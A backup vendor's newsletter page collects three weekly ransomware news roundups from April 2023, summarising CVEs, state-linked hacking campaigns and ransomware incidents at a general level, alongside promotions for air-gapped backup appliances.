Select Page
Slide 1

Weekly

Ransomware Roundup

Apr 24 - 28, 2023

Critical RCE Authentication Flaws Affect APC UPS Software

Critical RCE vulnerabilities in APC's online UPS monitoring software, called 'TLStorm', allow remote device access and control by hackers. The flaws (CVE-2023-29411, CVE-2023-29412, and CVE-2023-29413) can execute code, cause DoS, and mishandle case sensitivity. The Easy UPS Online Monitoring Software v2.5-GA-01-22320 and earlier versions are affected, as well as all Windows versions and Windows Server 2016, 2019, and 2022. Users are advised to upgrade to V2.5-GS-01-23036 and disable "program" mode. Read more

Lazarus Subgroup BlueNoroff Deploys RustBucket Malware on Apple Devices

BlueNoroff, a North Korean hacking group, is using a new macOS malware called RustBucket to steal sensitive data and deploy ransomware. The malware is disguised as an "Internal PDF Viewer" application, and once a file is opened, it executes malicious code, bypassing traditional security measures. The group uses job-themed lures to distribute the malware and retrieves a second-stage payload from a remote server. Read more

New Zero-Day Exploits Allow Remote Code Execution on Chrome and Edge

Google warns Chrome and Edge users to update their browsers as two zero-day exploits have been discovered. The CVE-2023-2033 and CVE-2023-2136 vulnerabilities could be exploited remotely and allow attackers to execute remote code and perform a sandbox escape. The former is a type confusion error, while the latter is an integer overflow in Skia. Read more

Chinese Threat Group Gallium Uses PingPull and Sword2033 Malware for Espionage

Chinese hacker group - Gallium, AKA Alloy Taurus, is using two new variants of Linux malware, PingPull and Sword2033, to launch cyberespionage attacks in South Africa and Nepal. PingPull is a remote access trojan controlled by the attacker’s C2 server using different HTTP parameters, while Sword2023 is a backdoor that communicates with the same C2 server and can exfiltrate sensitive files for espionage. Read more

How to Calculate and Improve Recovery Time and Point Objectives

Improve your recovery time and point objectives (RTPO) by calculating them accurately. This blog post shares insights on calculating RTPO and how to enhance it. The post discusses the importance of RTPO, how to calculate it, and measures to improve it. It also emphasizes the significance of a robust disaster recovery plan to ensure that businesses are not affected by unforeseen disruptions. Read more

Point32Health Confirms Ransomware Attack, Service Disruption for Health Insurance Customers

Point32Health, a health insurer, has confirmed a ransomware attack on its IT systems, resulting in service disruption for customers. The attack targeted customer data, and the identity of the attackers and the ransomware used in the attack remain undisclosed. Law enforcement and cybersecurity experts have been notified of the incident. Read more

Promo
98TB Immutable & Air-Gapped Veeam Backup & DR appliance with 10 Veeam Backup Essential licenses for $9,995

98TB Fully Air Gapped and Immutable Veeam Backup and DR appliance with 10 Veeam Backup Essentials Annual Subscription License for $9,995.

10th Gen, 8-bay 2U Rackmount unit with 7x14TB (98TB) Enterprise SAS drives, 10 core Storage Virtualization Engine, 32GB System Memory, 512GB NVMe SSD, Redundant Hot-Swappable Power Supply, 12Gb SAS Hardware RAID Controller, Dual 10Gb RJ-45 Ports, Fully Integrated SAN, NAS and optional S3 cloud storage.

All Enterprise Data services such as immutable snapshot, encryption (Hardware), Dedupe (hardware), Replication (Sync, Async), Thin provisioning, HOT/COLD Tiering, Flash Cache (NVMe+SSD), WORM (Immutable policy-based vault), Predictive failure, call home, Real-time performance, report, and notification are available as an option if needed.

For appliance demos, specifications, and quotes contact us.

Slide 1

Weekly

Ransomware Roundup

Apr 10 - 14, 2023

Microsoft Traces Azure Wiper Attacks to Iranian APTs MuddyWater and DEV-1084

Iranian hackers MuddyWater and DEV-1084 are carrying out cyberattacks targeting Middle Eastern entities. The attackers exploit vulnerable devices accessible via the internet, create admin accounts, deploy web shells and backdoors, and steal login credentials. The attackers use compromised Azure Active Directory accounts with global administrator privileges to cause data loss and denial of service and Group Policy Objects to deploy DarkBit ransomware and exfiltrate data from mailboxes. The US government has officially tied DEV-1084 to Iran’s Ministry of Intelligence and Security. Read more

Ichitaro Word Processor Found to Have Critical Security Vulnerabilities by Experts

Japanese word processor Ichitaro is vulnerable to four arbitrary code execution flaws that allow hackers to gain control of the system. The vulnerabilities can lead to arbitrary code execution and allow memory corruption. JustSystems has issued fixes for the vulnerabilities that affect the 2021, 2022, and 2023 versions of Ichitaro and the trial version of Ichitaro 2022 and Ichitaro Viewer. Japan's Computer Emergency Response Team has warned that other JustSystems products may also be affected. Read more

Orca Warns of Microsoft Azure Shared Key Authorization Exploitation

Orca has warned that hackers can gain full access to accounts and business data and execute remote code by exploiting Microsoft Azure shared key authorization - an inferior security method compared to Azure Active Directory credentials. Attackers possessing the account access keys can abuse shared key authorization to gain full access to a storage account, access critical business assets, and execute remote code. Orca recommends disabling shared key authorization altogether to mitigate risks. Read more

Nokoyawa Ransomware Deployed Using Windows Zero-Day Exploit

Cybercriminals have been exploiting the CVE-2023-28252 vulnerability in a series of ransomware attacks. The flaw affects the Windows CLFS driver that allows elevated privileges to the System. Cybercriminals deploy the Nokoyawa ransomware using this exploit and many similar but unique exploits. The Nokoyawa ransomware encrypts files and threatens to leak valuable data unless a ransom is paid. The cybercriminals behind Nokoyawa have ties to the Karma and Nemty ransomware families and to the infamous Hive operation. Read more

Azure Backup vs AWS Backup: Which Cloud Backup Solution is More Secure

Both Azure and AWS have robust security features that meet industry standards. But there are several key factors to consider, including data encryption, access control, compliance certifications, backup and recovery options, and more. We have written this blog to explore these factors in depth and help you decide which cloud provider is best for your organization's cloud backup needs. Read more

Phishing Campaign Targets Accounting and Tax Return Firms to Deploy Remcos RAT

Microsoft has warned about a phishing campaign targeting accounting firms and tax preparers. The phishing campaign begins with fake emails that appear to be from clients, sending documents to complete their tax returns. The attachments contain various tax forms in PDF format but are, in fact, Windows shortcuts in disguise. These shortcuts execute PowerShell to download an obfuscated VBS file that downloads a fake PDF and executes the GuLoader malware, which then installs the Remcos remote access trojan on the network. Read more

Promo
192TB Immutable & Air-Gapped Veeam Backup & DR appliance with 20 Veeam Backup Essential licenses for $15,995

192TB Fully Air Gapped and Immutable Veeam Backup and DR appliance with 20 Veeam Backup Essential Annual Subscription Licenses for $15,995.

10th Gen, 12-bay 2U Rackmount unit with 12x16TB (192TB) Enterprise SAS drives, 10 Core Storage Virtualization Engine, 32GB System Memory, 512GB NVMe SSD, Redundant Hot-Swappable Power Supply, 12Gb SAS Hardware RAID Controller, Dual 10Gb RJ-45 Ports, Fully Integrated SAN, NAS and optional S3 cloud storage.

All Enterprise Data services such as immutable snapshot, encryption (Hardware), Dedupe (hardware), Replication (Sync, Async), Thin provisioning, HOT/COLD Tiering, Flash Cache (NVMe+SSD), WORM (Immutable policy-based vault), Predictive failure, call home, Real-time performance, report, and notification are available as an option if needed.

For appliance demos, specifications, and quotes contact us.

Slide 1

Weekly

Ransomware Roundup

Apr 3 - 7, 2023

AlienFox Strikes the Cloud: Credentials for 18 Services Stolen by New Toolkit

The AlienFox toolkit can steal cloud credentials for 18 different services. The toolkit uses data-extraction scripts to examine misconfigured servers for sensitive configuration files holding secrets like account credentials, API keys, and authentication tokens. It exploits the CVE-2022-31279 vulnerability using a deserialization flaw in the Laravel PHP Framework, scans the files for credentials, runs them against the targeted server, and attempts to SSH using the Paramiko Python library. Read more

Lazarus Group Supply Chain Attack Targets 3CX VoIP Company and Cryptocurrency Firms

The Lazarus Group has launched a supply chain attack on 3CX, a VoIP service provider and distributed the Gopuram malware to its clients that include several cryptocurrency firms. The malware can harvest credentials, install backdoors, and download additional payloads. The attackers also used a multi-stage infection process, including a sophisticated DLL sideloading technique, to remain undetected by traditional security tools.

NATO Nations at Risk: CISA Alerts of Zimbra Bug Exploitation

CISA has directed federal agencies to address a security flaw in Zimbra Collaboration software, which Russian hackers are exploiting to access the mailboxes of government officials. The Winter Vivern group used a vulnerability scanner to search for vulnerable ZCS servers, sent phishing emails to users, and took advantage of the CVE-2022-27926 vulnerability to launch a Cross-Site Request Forgery attack to steal credentials. CISA has added the vulnerability to its Known Vulnerability Catalogues and directed federal agencies to patch it until April 24. Read more

ALPHV Ransomware Affiliate Exploits Veritas Backup Exec Flaws for Network Intrusion

An ALPHV ransomware affiliate dubbed UNC4466 has been exploiting vulnerabilities in Veritas Backup software to gain initial access to target networks. The UNC4466 group deviates from typical intrusion methods that rely on stolen credentials and instead gains access to internet-facing Windows servers running Veritas Backup Exec using Metasploit. The attacker then uses Advanced IP Scanner and ADRecon to collect information about the compromised environment. Read more

Safeguarding Your Data: Best Practices for Secure Cloud Storage

Cloud storage provides convenience and flexibility, but it also poses a range of security challenges. It’s becoming increasingly important for decision makers to understand how to implement and manage enterprise cloud storage solutions effectively. Here are some practical tips and best practices for enterprise cloud computing that decision makers can use to maximize the benefits of cloud storage while ensuring enterprise cloud security. Read more

New Ransomware Gang ‘Money Message’ Demands Million-Dollar Ransoms

The "Money Message" ransomware gang is targeting businesses globally using various tactics to gain initial access, like exploiting vulnerable remote desktop services, spear-phishing emails, and deploying malware via a third-party service provider's software update mechanism. Once inside, they move laterally through the network, disable backup systems, delete Shadow Volume Copies and stop some processes and Windows services to evade detection. The gang demands ransoms ranging from tens of thousands to millions of dollars. Read more

Promo
70TB $7,995 Air-Gapped & Immutable Veeam, Rubrik, Commvault, Site recovery Backup & DR appliance

70TB expandable up to 4PB Air-gaped & Immutable Veeam, Rubrik, Commvault, Site Recovery, Backup and DR appliance with Object Lockdown Technology for Ransomware protection for $7,995.

8-bay 2U Rackmount unit with 5x14TB Enterprise SAS drives, 10 Core Storage Virtualization Engine, 32GB System Memory, 512GB NVMe SSD, Hot-Swappable Power Supply, 12Gb SAS Hardware RAID Controller. Fully Integrated SAN, NAS and Native S3 cloud object storage.

All Enterprise Data services such as immutable snapshot, encryption (Hardware), Dedupe (hardware), Replication (Sync, Async), Thin provisioning, HOT/COLD Tiering, Flash Cache (NVMe+SSD), WORM (Immutable policy-based vault), Predictive failure, call home, Real-time performance, report, and notification are included.

For appliance demos, specifications, and quotes contact us.

Subscribe To Our Newsletter

Join our mailing list to receive the latest news, updates, and promotions from StoneFly.

Please Confirm your subscription from the email